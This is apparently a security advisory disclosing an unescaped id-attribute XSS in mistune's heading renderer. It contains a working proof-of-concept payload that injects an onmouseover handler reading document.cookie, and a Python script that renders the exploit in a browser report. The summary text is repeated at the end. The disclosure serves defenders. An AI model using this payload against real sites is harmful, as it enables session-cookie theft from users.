Summary
HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.
The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like #installation or #getting-started — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.
Details
File: src/mistune/renderers/html.py
def heading(self, text: str, level: int, **attrs: Any) -> str:
tag = "h" + str(level)
html = "<" + tag
_id = attrs.get("id")
if _id:
html += ' id="' + _id + '"' # ← _id is never escaped
return html + ">" + text + "</" + tag + ">\n"
The text body (line content) is escaped upstream by the inline token renderer, which is why text arrives as " etc. But _id arrives as a raw string directly from whatever the heading_id callback returned — no escaping occurs at any point in the pipeline.
PoC
Step 1 — Establish the baseline (safe default IDs)
The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, …
bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)
Output — ID is auto-generated, no user text appears in it:
<h2 id="toc_1">Introduction</h2>
Step 2 — Add the realistic trigger: a text-based heading_id callback
Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:
def raw_id(token, index):
return token.get("text", "") # returns raw heading text as the ID
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
Step 3 — Craft the exploit payload
Construct a heading whose text contains a double-quote followed by an injected attribute:
## foo" onmouseover="alert(document.cookie)" x="
When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.
Step 4 — Observe attribute breakout in the output
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)
Actual output:
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo" onmouseover="alert(document.cookie)" x="</h2>
Note: the heading body text is correctly escaped ("), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.
Script
A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook
def raw_id(token, index):
return token.get("text", "")
# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)
bl_file = "baseline_h2.md"
bl_src = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)
print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)
# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
ex_file = "exploit_h2.md"
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)
print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)
# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""
def case(kind, label, filename, src, out):
return f"""
<div class="case {kind}">
<div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
<div class="panels">
<div class="panel">
<h3>Input — {h.escape(filename)}</h3>
<pre>{h.escape(src)}</pre>
</div>
<div class="panel">
<h3>Output — HTML source</h3>
<pre>{h.escape(out)}</pre>
<div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
<div class="rendered">{out}</div>
</div>
</div>
</div>"""
page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""
out_path = os.path.join(os.getcwd(), "report_h2.html")
with open(out_path, "w") as f:
f.write(page)
print(f"\n[report] {out_path}")
Example Usage:
Once the script is run, open report_h2.html in the browser and observe the behaviour.
Impact
| Dimension |
Assessment |
| Confidentiality |
Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |
| Integrity |
DOM manipulation, phishing content injection, forced navigation |
| Availability |
Page freeze or crash available to attacker |
Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading_id callback without independently sanitising the returned value.
References
Summary
HTMLRenderer.heading()builds the opening<hN>tag by string-concatenating theidattribute value directly into the HTML — with no call toescape(),safe_entity(), or any other sanitisation function. A double-quote character"in theidvalue terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers,src=,href=, etc.) into the heading element.The default TOC hook assigns safe auto-incremented IDs (
toc_1,toc_2, …) that never contain user text. However, theadd_toc_hook()API accepts a caller-suppliedheading_idcallback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like#installationor#getting-started— is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of theid=attribute.Details
File:
src/mistune/renderers/html.pyThe
textbody (line content) is escaped upstream by the inline token renderer, which is whytextarrives as"etc. But_idarrives as a raw string directly from whatever theheading_idcallback returned — no escaping occurs at any point in the pipeline.PoC
Step 1 — Establish the baseline (safe default IDs)
The script creates a parser with
escape=Trueand the defaultadd_toc_hook()(no customheading_idcallback). The default hook generates sequential numeric IDs:Output — ID is auto-generated, no user text appears in it:
Step 2 — Add the realistic trigger: a text-based
heading_idcallbackDeriving an anchor ID from the heading text is the standard real-world pattern (slugifiers,
mkdocs,sphinx,jekyllall do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:Step 3 — Craft the exploit payload
Construct a heading whose text contains a double-quote followed by an injected attribute:
When
raw_idis called,token["text"]isfoo" onmouseover="alert(document.cookie)" x=". This is passed verbatim toheading()as theidattribute value.Step 4 — Observe attribute breakout in the output
Actual output:
Note: the heading body text is correctly escaped (
"), but theid=attribute is not. A user who moves their mouse over the heading triggersalert(document.cookie). Any JavaScript payload can be substituted.Script
A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.
Example Usage:
Once the script is run, open
report_h2.htmlin the browser and observe the behaviour.Impact
Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's
heading_idcallback without independently sanitising the returned value.References